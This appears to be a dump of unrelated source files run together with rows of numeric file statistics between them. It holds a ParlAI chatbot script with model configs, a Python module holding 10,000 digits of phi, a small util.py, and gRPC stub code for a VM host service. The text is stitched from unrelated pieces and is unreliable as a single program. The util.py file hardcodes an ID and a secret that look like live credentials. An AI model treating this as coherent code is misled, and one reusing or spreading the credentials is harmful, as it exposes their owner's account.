True, 'image_fusion_type': 'late', 'parlai_home': '/home/tatiana/ParlAI', 'override': {'model_file': '/home/tatiana/ParlAI/data/models/dodecadialogue/empathetic_dialogues_ft/model'}, 'starttime': 'Aug24_14-42'}
opt_ed = {'activation': 'gelu',
'adafactor_eps': '(1e-30, 0.001)',
'adam_eps': 1e-08,
'add_p1_after_newln': False,
'aggregate_micro': False,
'attention_dropout': 0.0,
'batch_length_range': 5,
'batch_sort_cache_type': 'pop',
'batch_sort_field': 'ext',
'batchsize': 16,
'beam_block_full_context': False,
'beam_block_list_filename': None,
'beam_block_ngram': -1,
'beam_context_block_ngram': -1,
'beam_delay': 30,
'beam_length_penalty': 0.65,
'beam_min_length': 1,
'beam_size': 1,
'betas': [0.9, 0.999],
'bpe_add_prefix_space': None,
'bpe_debug': False,
'bpe_merge': None,
'bpe_vocab': None,
'compute_tokenized_bleu': False,
'datapath': '/home/tatiana/.local/lib/python3.8/site-packages/data',
'datatype': 'train',
'delimiter': '\n',
'dict_class': 'parlai.core.dict:DictionaryAgent',
'dict_endtoken':' __end__',
'dict_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/empathetic_dialogues_ft/model.dict',
'dict_include_test': False,
'dict_include_valid': False,
'dict_initpath': None,
'dict_language': 'english',
'dict_loaded': True,
'dict_lower': True,
'dict_max_ngram_size': -1,
'dict_maxexs': -1,
'dict_maxtokens': -1,
'dict_minfreq': 0,
'dict_nulltoken': '__null__',
'dict_starttoken': '__start__',
'dict_textfields': 'text,labels',
'dict_tokenizer': 'bpe',
'dict_unktoken': '__unk__',
'display_examples': False,
'display_ignore_fields': 'label_candidates,text_candidates',
'display_partner_persona': True,
'display_prettify': False,
'download_path': '/home/tatiana/.local/lib/python3.8/site-packages/downloads',
'dropout': 0.1,
'dynamic_batching': None,
'embedding_projection': 'random',
'embedding_size': 512,
'embedding_type': 'random',
'embeddings_scale': True,
'eval_batchsize': None,
'evaltask': None,
'ffn_size': 2048,
'force_fp16_tokens': False,
'fp16': False,
'fp16_impl': 'apex',
'gpu': -1,
'gradient_clip': 0.1,
'hf_skip_special_tokens': True,
'hide_labels': False,
'history_add_global_end_token': None,
'history_reversed': False,
'history_size': -1,
'image_cropsize': 224,
'image_encoder_num_layers': 1,
'image_features_dim': 2048,
'image_fusion_type': 'late',
'image_mode': None,
'image_size': 256,
'include_image_token': True,
'inference': 'greedy',
'init_model': 'data/models/dodecadialogue/base_model/model',
'init_opt': None,
'interactive_mode': True,
'interactive_task': True,
'invsqrt_lr_decay_gamma': -1,
'label_truncate': 128,
'learn_positional_embeddings': True,
'learningrate': 1e-08,
'load_from_checkpoint': True,
'local_human_candidates_file': None,
'log_every_n_secs': 10.0,
'log_keep_fields': 'all',
'loglevel': 'info',
'lr_scheduler': 'reduceonplateau',
'lr_scheduler_decay': 0.5,
'lr_scheduler_patience': 3,
'max_lr_steps': -1,
'max_train_time': 84600.0,
'metrics': 'default',
'model': 'image_seq2seq',
'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/empathetic_dialogues_ft/model',
'model_parallel': False,
'momentum': 0,
'ultitask_weights': [1],
'n_decoder_layers': -1,
'n_encoder_layers': -1,
'n_heads': 16,
'n_image_channels': 1,
'n_image_tokens': 1,
'n_layers': 8,
'n_positions': 512,
'n_segments': 0,
'nesterov': True,
'no_cuda': False,
'num_epochs': -1,
'numthreads': 1,
'numworkers': 4,
'nus': [0.7],
'optimizer': 'adamax',
'outfile': None,
'output_scaling': 1.0,
'override': {'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/dodecadialogue/empathetic_dialogues_ft/model'},
'parlai_home': '/checkpoint/kshuster/projects/parlall/parlall_MT_plus_FT/parlall_MT_plus_FT_sweep1_Tue_Oct_29/ParlAI',
'person_tokens': False,
'pytorch_context_length': -1,
'pytorch_datapath': None,
'pytorch_include_labels': True,
'pytorch_preprocess': False,
'pytorch_teacher_batch_sort': False,
'pytorch_teacher_dataset': None,
'pytorch_teacher_task': None,
'rank_candidates': False,
'relu_dropout': 0.0,
'save_after_valid': True,
'save_every_n_secs': -1,
'save_format': 'conversations',
'share_word_embeddings': True,
'short_final_eval': False,
'show_advanced_args': False,
'shuffle': False,
'single_turn': False,
'skip_generation': True,
'special_tok_lst': None,
'split_lines': False,
'starttime': 'Oct29_07-56',
'task': 'convai2',
'temperature': 1.0,
'tensorboard_log': False,
'text_truncate': 512,
'topk': 10,
'topp': 0.9,
'truncate': -1,
'update_freq': 1,
'use_reply': 'label',
'validation_cutoff': 1.0,
'validation_every_n_epochs': -1,
'validation_every_n_secs': 3600.0,
'validation_max_exs': -1,
'validation_metric': 'ppl',
'validation_metric_mode': min,
'validation_patience': 10,
'validation_share_agent': False,
'variant': 'xlm',
'warmup_rate': 0.0001,
'warmup_updates': 2000,
'weight_decay': None
}
# python parlai interactive -mf zoo:blended_skill_talk/bst_single_task/model -t blended_skill_talk
#opt_bst = {'init_opt': None, 'task': 'blended_skill_talk', 'download_path': '/home/tatiana/ParlAI/downloads', 'loglevel': 'info', 'datatype': 'train', 'image_mode': 'raw', 'hide_labels': False, 'multitask_weights': [1], 'batchsize': 1, 'dynamic_batching': None, 'datapath': '/home/tatiana/ParlAI/data', 'model': None, 'model_file': '/home/tatiana/ParlAI/data/models/blended_skill_talk/bst_single_task/model', 'init_model': None, 'dict_class': 'parlai.core.dict:DictionaryAgent', 'display_examples': False, 'display_prettify': False, 'display_ignore_fields': 'label_candidates,text_candidates', 'interactive_task': True, 'outfile': '', 'save_format': 'conversations', 'local_human_candidates_file': None, 'single_turn': False, 'log_keep_fields': 'all', 'image_size': 256, 'image_cropsize': 224, 'interactive_mode': True, 'embedding_type': 'random', 'embedding_projection': 'random', 'fp16': False, 'fp16_impl': 'apex', 'force_fp16_tokens': False, 'optimizer': 'adamax', 'learningrate': 0.0001, 'gradient_clip': 0.1, 'adam_eps': 1e-08, 'adafactor_eps': (1e-30, 0.001), 'momentum': 0, 'nesterov': True, 'nus': (0.7,), 'betas': (0.9, 0.999), 'weight_decay': None, 'rank_candidates': False, 'truncate': 1024, 'text_truncate': None, 'label_truncate': None, 'history_reversed': False, 'history_size': -1, 'person_tokens': False, 'split_lines': False, 'use_reply': 'label', 'add_p1_after_newln': False, 'delimiter': '\n', 'history_add_global_end_token': None, 'special_tok_lst': None, 'gpu': -1, 'no_cuda': False, 'lr_scheduler': 'reduceonplateau', 'lr_scheduler_patience': 3, 'lr_scheduler_decay': 0.5, 'max_lr_steps': -1, 'invsqrt_lr_decay_gamma': -1, 'warmup_updates': -1, 'warmup_rate': 0.0001, 'update_freq': 1, 'candidates': 'inline', 'eval_candidates': 'inline', 'interactive_candidates': 'fixed', 'repeat_blocking_heuristic': True, 'fixed_candidates_path': None, 'fixed_candidate_vecs': 'reuse', 'encode_candidate_vecs': True, 'encode_candidate_vecs_batchsize': 256, 'train_predict': False, 'cap_num_predictions': 100, 'ignore_bad_candidates': False, 'rank_top_k': -1, 'inference': 'max', 'topk': 5, 'return_cand_scores': False, 'embedding_size': 300, 'n_layers': 2, 'ffn_size': 300, 'dropout': 0.0, 'attention_dropout': 0.0, 'relu_dropout': 0.0, 'n_heads': 2, 'learn_positional_embeddings': False, 'embeddings_scale': True, 'n_positions': None, 'n_segments': 0, 'variant': 'aiayn', 'activation': 'relu', 'output_scaling': 1.0, 'n_encoder_layers': -1, 'n_decoder_layers': -1, 'model_parallel': False, 'use_memories': False, 'wrap_memory_encoder': False, 'memory_attention': 'sqrt', 'normalize_sent_emb': False, 'share_encoders': True, 'share_word_embeddings': True, 'learn_embeddings': True, 'data_parallel': False, 'reduction_type': 'mean', 'dict_file': None, 'dict_initpath': None, 'dict_language': 'english', 'dict_max_ngram_size': -1, 'dict_minfreq': 0, 'dict_maxtokens': -1, 'dict_nulltoken': '__null__', 'dict_starttoken': '__start__', 'dict_endtoken': '__end__', 'dict_unktoken': '__unk__', 'dict_tokenizer': 're', 'dict_lower': False, 'bpe_debug': False, 'dict_textfields': 'text,labels', 'bpe_vocab': None, 'bpe_merge': None, 'bpe_add_prefix_space': None, 'hf_skip_special_tokens': True, 'polyencoder_type': 'codes', 'poly_n_codes': 64, 'poly_attention_type': 'basic', 'poly_attention_num_heads': 4, 'codes_attention_type': 'basic', 'codes_attention_num_heads': 4, 'display_partner_persona': True, 'include_personas': True, 'include_initial_utterances': False, 'safe_personas_only': True, 'parlai_home': '/home/tatiana/ParlAI', 'override': {'model_file': '/home/tatiana/ParlAI/data/models/blended_skill_talk/bst_single_task/model', 'task': 'blended_skill_talk'}, 'starttime': 'Aug24_13-01'}
opt_bst = {'init_opt': None, 'task': 'blended_skill_talk', 'download_path': '/home/tatiana/.local/lib/python3.8/site-packages/downloads', 'loglevel': 'info', 'datatype': 'train', 'image_mode': 'raw', 'hide_labels': False, 'multitask_weights': [1], 'batchsize': 1, 'dynamic_batching': None, 'datapath': '/home/tatiana/.local/lib/python3.8/site-packages/data', 'model': None, 'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/blender/blender_90M/model', 'init_model': None, 'dict_class': 'parlai.core.dict:DictionaryAgent', 'display_examples': False, 'display_prettify': False, 'display_ignore_fields': 'label_candidates,text_candidates', 'interactive_task': True, 'safety': 'all', 'local_human_candidates_file': None, 'single_turn': False, 'image_size': 256, 'image_cropsize': 224, 'embedding_size': 300, 'n_layers': 2, 'ffn_size': 300, 'dropout': 0.0, 'attention_dropout': 0.0, 'relu_dropout': 0.0, 'n_heads': 2, 'learn_positional_embeddings': False, 'embeddings_scale': True, 'n_positions': None, 'n_segments': 0, 'variant': 'aiayn', 'activation': 'relu', 'output_scaling': 1.0, 'share_word_embeddings': True, 'n_encoder_layers': -1, 'n_decoder_layers': -1, 'model_parallel': False, 'beam_size': 1, 'beam_min_length': 1, 'beam_context_block_ngram': -1, 'beam_block_ngram': -1, 'beam_block_full_context': True, 'beam_length_penalty': 0.65, 'skip_generation': False, 'inference': 'greedy', 'topk': 10, 'topp': 0.9, 'beam_delay': 30, 'beam_block_list_filename': None, 'temperature': 1.0, 'compute_tokenized_bleu': False, 'interactive_mode': True, 'embedding_type': 'random', 'embedding_projection': 'random', 'fp16': False, 'fp16_impl': 'apex', 'force_fp16_tokens': False, 'optimizer': 'sgd', 'learningrate': 1, 'gradient_clip': 0.1, 'adam_eps': 1e-08, 'adafactor_eps': (1e-30, 0.001), 'momentum': 0, 'nesterov': True, 'nus': (0.7,), 'betas': (0.9, 0.999), 'weight_decay': None, 'rank_candidates': False, 'truncate': -1, 'text_truncate': None, 'label_truncate': None, 'history_reversed': False, 'history_size': -1, 'person_tokens': False, 'split_lines': False, 'use_reply': 'label', 'add_p1_after_newln': False, 'delimiter': '\n', 'history_add_global_end_token': None, 'special_tok_lst': None, 'gpu': -1, 'no_cuda': False, 'dict_file': None, 'dict_initpath': None, 'dict_language': 'english', 'dict_max_ngram_size': -1, 'dict_minfreq': 0, 'dict_maxtokens': -1, 'dict_nulltoken': '__null__', 'dict_starttoken': '__start__', 'dict_endtoken': '__end__', 'dict_unktoken': '__unk__', 'dict_tokenizer': 're', 'dict_lower': False, 'bpe_debug': False, 'dict_textfields': 'text,labels', 'bpe_vocab': None, 'bpe_merge': None, 'bpe_add_prefix_space': None, 'hf_skip_special_tokens': True, 'lr_scheduler': 'reduceonplateau', 'lr_scheduler_patience': 3, 'lr_scheduler_decay': 0.5, 'max_lr_steps': -1, 'invsqrt_lr_decay_gamma': -1, 'warmup_updates': -1, 'warmup_rate': 0.0001, 'update_freq': 1, 'display_partner_persona': True, 'include_personas': True, 'include_initial_utterances': False, 'safe_personas_only': True, 'parlai_home': '/home/tatiana/.local/lib/python3.8/site-packages', 'override': {'model_file': '/home/tatiana/.local/lib/python3.8/site-packages/data/models/blender/blender_90M/model', 'task': 'blended_skill_talk'}, 'starttime': 'Aug26_02-41'}
#python parlai/scripts/interactive.py -mf zoo:dialogue_unlikelihood/rep_wiki_ctxt_and_label/model -m projects.dialogue_unlikelihood.agents:RepetitionUnlikelihoodAgent
def setup_args(parser=None):
if parser is None:
parser = ParlaiParser(
True, True, 'Interactive chat with a model on the command line'
)
parser.add_argument('-d', '--display-examples', type='bool', default=False)
parser.set_defaults(interactive_mode=True, task='interactive')
LocalHumanAgent.add_cmdline_args(parser)
WorldLogger.add_cmdline_args(parser)
return parser
def interactive(opt):
if isinstance(opt, ParlaiParser):
logging.error('interactive should be passed opt not Parser')
opt = opt.parse_args()
# Create model and assign it to the specified task
human_agent = LocalHumanAgent(opt_convai)
convai_agent = create_agent(opt_convai, requireModelExists=True)
ed_agent = create_agent(opt_ed, requireModelExists=True)
bst_agent = create_agent(opt_bst, requireModelExists=True)
models = [convai_agent,ed_agent,bst_agent]
labels = ['CONVAI2','EMPATHETIC_DIALOGUES','BLENDED_SKILL_TALK']
imperial_quips = ImperialQuipWorld(human_agent, models, labels)
keep_suggesting = True
while(keep_suggesting):
suggestions = imperial_quips.parley()
selection = input("Choose suggestion: ")
modification = input("Do you wish to modify the selected response? (y/n): ")
if modification == 'y':
personalise_message.personalise_message(suggestions[int(selection)-1])
else:
print("Response: "+suggestions[int(selection)-1])
user_input = input("")
if user_input == "EXIT":
keep_suggesting = False
@register_script('interactive', aliases=['i'])
class Interactive(ParlaiScript):
@classmethod
def setup_args(cls):
return setup_args()
def run(self):
return interactive(self.opt)
if __name__ == '__main__':
random.seed(42)
Interactive.main()
| 58.915929
| 3,700
| 0.727901
| 3,600
| 26,630
| 5.031389
| 0.127222
| 0.018219
| 0.00795
| 0.015735
| 0.869376
| 0.861426
| 0.856015
| 0.847016
| 0.843096
| 0.843096
| 0
| 0.030792
| 0.092677
| 26,630
| 451
| 3,701
| 59.046563
| 0.718856
| 0.413068
| 0
| 0.791045
| 0
| 0.019901
| 0.55436
| 0.194199
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014925
| false
| 0.002488
| 0.027363
| 0.004975
| 0.062189
| 0.007463
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9c122c71ad163dbaa76fec16d6ceef8f30adb916
| 13,405
|
py
|
Python
|
pwe/phi.py
|
Saran33/pwe_analysis
|
f966c7b5f0da4a0a6d3725c6bc3fe7b54d44e53a
|
[
"MIT"
] | null | null | null |
pwe/phi.py
|
Saran33/pwe_analysis
|
f966c7b5f0da4a0a6d3725c6bc3fe7b54d44e53a
|
[
"MIT"
] | null | null | null |
pwe/phi.py
|
Saran33/pwe_analysis
|
f966c7b5f0da4a0a6d3725c6bc3fe7b54d44e53a
|
[
"MIT"
] | 1
|
2022-01-24T10:56:40.000Z
|
2022-01-24T10:56:40.000Z
|
# First 10,000 Decimals of Phi (φ)
φ = "1.6180339887498948482045868343656381177203091798057628621354486227052604628189024497072072041893911374847540880753868917521266338622235369317931800607667263544333890865959395829056383226613199282902678806752087668925017116962070322210432162695486262963136144381497587012203408058879544547492461856953648644492410443207713449470495658467885098743394422125448770664780915884607499887124007652170575179788341662562494075890697040002812104276217711177780531531714101170466659914669798731761356006708748071013179523689427521948435305678300228785699782977834784587822891109762500302696156170025046433824377648610283831268330372429267526311653392473167111211588186385133162038400522216579128667529465490681131715993432359734949850904094762132229810172610705961164562990981629055520852479035240602017279974717534277759277862561943208275051312181562855122248093947123414517022373580577278616008688382952304592647878017889921990270776903895321968198615143780314997411069260886742962267575605231727775203536139362107673893764556060605921658946675955190040055590895022953094231248235521221241544400647034056573479766397239494994658457887303962309037503399385621024236902513868041457799569812244574717803417312645322041639723213404444948730231541767689375210306873788034417009395440962795589867872320951242689355730970450959568440175551988192180206405290551893494759260073485228210108819464454422231889131929468962200230144377026992300780308526118075451928877050210968424936271359251876077788466583615023891349333312231053392321362431926372891067050339928226526355620902979864247275977256550861548754357482647181414512700060238901620777322449943530889990950168032811219432048196438767586331479857191139781539780747615077221175082694586393204565209896985556781410696837288405874610337810544439094368358358138113116899385557697548414914453415091295407005019477548616307542264172939468036731980586183391832859913039607201445595044977921207612478564591616083705949878600697018940988640076443617093341727091914336501371576601148038143062623805143211734815100559013456101180079050638142152709308588092875703450507808145458819906336129827981411745339273120809289727922213298064294687824274874017450554067787570832373109759151177629784432847479081765180977872684161176325038612112914368343767023503711163307258698832587103363222381098090121101989917684149175123313401527338438372345009347860497929459915822012581045982309255287212413704361491020547185549611808764265765110605458814756044317847985845397312863016254487611485202170644041116607669505977578325703951108782308271064789390211156910392768384538633332156582965977310343603232254574363720412440640888267375843395367959312322134373209957498894699565647360072959998391288103197426312517971414320123112795518947781726914158911779919564812558001845506563295285985910009086218029775637892599916499464281930222935523466747593269516542140210913630181947227078901220872873617073486499981562554728113734798716569527489008144384053274837813782466917444229634914708157007352545707089772675469343822619546861533120953357923801460927351021011919021836067509730895752895774681422954339438549315533963038072916917584610146099505506480367930414723657203986007355076090231731250161320484358364817704848181099160244252327167219018933459637860878752870173935930301335901123710239171265904702634940283076687674363865132710628032317406931733448234356453185058135310854973335075996677871244905836367541328908624063245639535721252426117027802865604323494283730172557440583727826799603173936401328762770124367983114464369476705312724924104716700138247831286565064934341803900410178053395058772458665575522939158239708417729833728231152569260929959422400005606266786743579239724540848176519734362652689448885527202747787473359835367277614075917120513269344837529916499809360246178442675727767900191919070380522046123248239132610432719168451230602362789354543246176997575368904176365025478513824631465833638337602357789926729886321618583959036399818384582764491245980937043055559613797343261348304949496868108953569634828178128862536460842033946538194419457142666823718394918323709085748502665680398974406621053603064002608171126659954199368731609457228881092077882277203636684481532561728411769097926666552238468831137185299192163190520156863122282071559987646842355205928537175780765605036773130975191223973887224682580571597445740484298780735221598426676625780770620194304005425501583125030175340941171910192989038447250332988024501436796844169479595453045910313811621870456799786636617460595700034459701135251813460065655352034788811741499412748264152135567763940390710387088182338068033500380468001748082205910968442026446402187705340100318028816644153091393948156403192822785482414510503188825189970074862287942155895742820216657062188090578088050324676991297287210387073697406435667458920258656573978560859566534107035997832044633634648548949766388535104552729824229069984885369682804645974576265143435905093832124374333387051665714900590710567024887985804371815126100440381488040725244061642902247822715272411208506578883871249363510680636516674322232776775579739927037623191470473239551206070550399208844260370879084333426183841359707816482955371432196118950379771463000755597537957035522714493191321725564401283091805045008992187051211860693357315389593507903007367270233141653204234015537414426871540551164796114332302485440409406911456139873026039518281680344825254326738575900560432024537271929124864581333441698529939135747869895798643949802304711696715736228391201812731291658995275991922031837235682727938563733126547998591246327503006059256745497943508811929505685493259355318729141801136412187470752628106869830135760524719445593219553596104528303148839117693011965858343144248948985655842508341094295027719758335224429125736493807541711373924376014350682987849327129975122868819604983577515877178041069713196675347719479226365190163397712847390793361111914089983056033610609871717830554354035608952929081846414371392943781356048203894791257450770755751030024207266290018090422934249425906066614133228722698069014599451199547801639915141261252572828066433126165746938819510644216738718000110042184830258091654338374923641183888564685143150063731904295148146942431460895254707203740556691306922099080481945297511065046428105417755259095187131888359147659960413179602094153085855332387725380232727632977372143127968216716234421183201802881412747443168847218459392781435474099999072233203059262976611238327983316988253931262006503702884478286669404473079471047612558658375298623625099982323359715507233838332440815257781933642626304330265895817080045127887311593558774721725649470005163667257715392098409503274511215368730091219962952276591316370939686072713426926231547533043799331658110736964314217197943405639155121081081362626888569748068060116918941750272298741586991791453499462444194012197858601373660828690722365147713912687420966513787562059185432888834174292090156313328319357562208971376563097850156315498245644586542479293572282875060848145335135218172958793299117100324762220521946451053624505129884308713444395072442673514628617991832336459836963763272257569159723954383052086647474238151107927349483695239647926899369832491799950278950006045966131346336302494995148080532901790297518251587504900743518798351183603272277260171740453557165885557829729106195819351710554825793070910057635869901929721799516873117556314448564810022001425454055429273458837116020994794572082378043687189448056368918258024449963187834202749101533579107273362532890693347412380222201162627711930854485029541913200400999865566651775664095365619789781838045103035651013158945890287186108690589394713680148457001836649564720329433437429894642741255143590584348409195487015236140317391390361644019845505104912116979200120199960506994966403035086369290394100701945053201623487276323273244943963048089055425137972331475185207091025063685981679530481810073942453170023880475983432345041425843140636127210960228242337822809027976596077710849391517488731687771352239009117117350918600654620099024975852779254278165970383495058010626155333691093784659771052975022317307412177834418941184596586102980187787427445638669661277245038458605264151030408982577775447411533207640758816775149755380471162966777100587664615954967769270549623939857092550702740699781408431249653630718665337180605874224259816530705257383454157705429216299811491750861131176577317209561565647869547448927132060806354577946241453106698374211379816896382353330447788316933972872891810366408326985698825443851667586228993069643468489751484087903964760420361020602171739447026348763365439319522907738361673898117812424836557810503416945156362604300366574310847665487778012857792364541852244723617137422925584159313561286637167032807217155339264632573067306391085410886808574283858828060230334140855039097353872613451196292641599521278931135443146015273090255382710432596622674390374556361228613907831943357059003814870089866131539819585744233044197085669672229314273074138488278897558886079973870447020316683485694199096548029824931981765792682985562972301068277723516274078380743187782731821191969528005160879157212882633796823127256287000150018292975772999357909491964076344286157571354442789838304045470271019458004258202120234458063034503365814721854920367998997293535391968121331951653797453991114942444518303385884129040181781882137600665928494136775431745160540938711036871521164040582193447120448277596054169486453987832626954801391501903899593130670318661670663719640256928671388714663118919268568269199527645799771827875946096161721886810945465157886912241060981419726861925547878992631535947292282508054251690681401078179602188533076230556381631640192245450325765673925997651753080142716071430871886285983603746505713420467008343275423027704779331118366690323288530687387990713590074030490745988951364768760867844323824821893061757031956380323081971936356727419643872625870615433072963703812751517040600505759488272385634515639052657710426459476040556950959840888903762079956638801786185591594411172509231327977113803"
# φ = φ.replace(' ', "")
# print(φ)
def phi(n=6):
"""
get Phi to a certain number of decimals places.
"""
phi = φ[0:n+2]
phi = float(phi)
return phi
def nextver():
"""
Return the φ to the next digit.
input : current_version : the first n digits of the golden ratio.
e.g. "1.6180339887498948482045868"
"6180339887498948482045868" or 6180339887498948482045868 etc.
"""
while True:
try:
current_version = input(
"What is the current version? ").strip().strip('"')
if current_version.startswith("0.1.61"):
cur_ver_n = len(current_version[2:])
start = φ.find(current_version[2:])
new_end = len(current_version[2:])+1
next_version = φ[start:new_end]
next_ver_n = len(next_version)
print(f"\nCurrent version: {current_version} ({cur_ver_n})\n")
print(f"Next version: 0.{next_version} ({next_ver_n})\n")
print(f"{next_version[2:]}\n")
break
elif current_version.startswith("1.61"):
cur_ver_n = len(current_version)
start = φ.find(current_version)
new_end = len(current_version)+1
next_version = φ[start:new_end]
next_ver_n = len(next_version)
print(
f"\nCurrent version: 0.{current_version} ({cur_ver_n})\n")
print(f"Next version: 0.{next_version} ({next_ver_n})\n")
print(f"{next_version[2:]}\n")
break
elif current_version.startswith("61"):
cur_ver_n = len(current_version)+2
start = φ.find(current_version)-2
new_end = len(current_version)+3
next_version = φ[start:new_end]
next_ver_n = len(next_version)
print(
f"\nCurrent version: 0.1.{current_version} ({cur_ver_n})\n")
print(f"Next version: 0.{next_version} ({next_ver_n})\n")
print(f"{next_version[2:]}\n")
break
elif current_version.startswith(".61"):
cur_ver_n = len(current_version)+1
start = φ.find(current_version)-1
new_end = len(current_version)+2
next_version = φ[start:new_end]
next_ver_n = len(next_version)
print(
f"\nCurrent version: 0.1{current_version} ({cur_ver_n})\n")
print(f"Next version: 0.{next_version} ({next_ver_n})\n")
print(f"{next_version[2:]}\n")
break
elif current_version not in φ:
print(
"\nInput is not the start of φ. Plea.se enter the first n digits of φ.")
print("\ne.g. 1.618... , .618... or 618...\n")
else:
print(
"\nInput is not the start of φ. Please enter the first n digits of φ.")
print("\ne.g. 1.618... , .618... or 618...\n")
except ValueError:
print("\nInput is not the start of φ. Please enter the first n digits of φ.")
print("\ne.g. 1.618... , .618... or 618...\n")
if __name__ == "__main__":
nextver()
| 154.08046
| 10,008
| 0.876166
| 431
| 13,405
| 27.048724
| 0.171694
| 0.028821
| 0.004804
| 0.006862
| 0.107308
| 0.09976
| 0.097615
| 0.097615
| 0.092898
| 0.092898
| 0
| 0.833607
| 0.091682
| 13,405
| 86
| 10,009
| 155.872093
| 0.12385
| 0.02417
| 0
| 0.424242
| 0
| 0
| 0.832771
| 0.768871
| 0
| 1
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0
| 0
| 0.045455
| 0.272727
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9c5ffd4cbd91edd262a5e432fe077f37f25cfed4
| 233
|
py
|
Python
|
stix_shifter/stix_transmission/src/modules/cloudIdentity/util.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | null | null | null |
stix_shifter/stix_transmission/src/modules/cloudIdentity/util.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | null | null | null |
stix_shifter/stix_transmission/src/modules/cloudIdentity/util.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | 2
|
2019-06-26T19:23:52.000Z
|
2019-07-09T15:33:16.000Z
|
def getUri():
return 'https://ppsdemo.ice.ibmcloud.com'
def getid():
return '35f095e9-65c6-4eab-9040-3c52ab6f3e3d'
def getSecret():
return '3f6bN4mw66'
def getRegistry():
return 'bbdef01e-dce8-4fa4-b310-88b42b48169d'
| 25.888889
| 49
| 0.716738
| 28
| 233
| 5.964286
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208955
| 0.137339
| 233
| 9
| 50
| 25.888889
| 0.621891
| 0
| 0
| 0
| 0
| 0
| 0.48927
| 0.309013
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
130e014dcd18d7c4b79b5d2559a40679137cb409
| 29,697
|
py
|
Python
|
tira-protocol/build/python/tira_host_pb2_grpc.py
|
maexe/tira
|
2018fb08d9f8b07f68fd4dadc4633d1ff25a88a3
|
[
"MIT"
] | null | null | null |
tira-protocol/build/python/tira_host_pb2_grpc.py
|
maexe/tira
|
2018fb08d9f8b07f68fd4dadc4633d1ff25a88a3
|
[
"MIT"
] | null | null | null |
tira-protocol/build/python/tira_host_pb2_grpc.py
|
maexe/tira
|
2018fb08d9f8b07f68fd4dadc4633d1ff25a88a3
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from . import tira_host_pb2 as tira__host__pb2
class TiraHostServiceStub(object):
"""-----------------------------------------------------------------------------
Definitions
-----------------------------------------------------------------------------
The service definition.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.vm_backup = channel.unary_unary(
'/tira.generated.TiraHostService/vm_backup',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.vm_create = channel.unary_unary(
'/tira.generated.TiraHostService/vm_create',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.vm_delete = channel.unary_unary(
'/tira.generated.TiraHostService/vm_delete',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.vm_info = channel.unary_unary(
'/tira.generated.TiraHostService/vm_info',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.VmInfo.FromString,
)
self.vm_list = channel.unary_unary(
'/tira.generated.TiraHostService/vm_list',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.vm_metrics = channel.unary_unary(
'/tira.generated.TiraHostService/vm_metrics',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.vm_sandbox = channel.unary_unary(
'/tira.generated.TiraHostService/vm_sandbox',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.vm_shutdown = channel.unary_unary(
'/tira.generated.TiraHostService/vm_shutdown',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.vm_snapshot = channel.unary_unary(
'/tira.generated.TiraHostService/vm_snapshot',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.vm_start = channel.unary_unary(
'/tira.generated.TiraHostService/vm_start',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.vm_stop = channel.unary_unary(
'/tira.generated.TiraHostService/vm_stop',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
self.vm_unsandbox = channel.unary_unary(
'/tira.generated.TiraHostService/vm_unsandbox',
request_serializer=tira__host__pb2.VmDetails.SerializeToString,
response_deserializer=tira__host__pb2.Transaction.FromString,
)
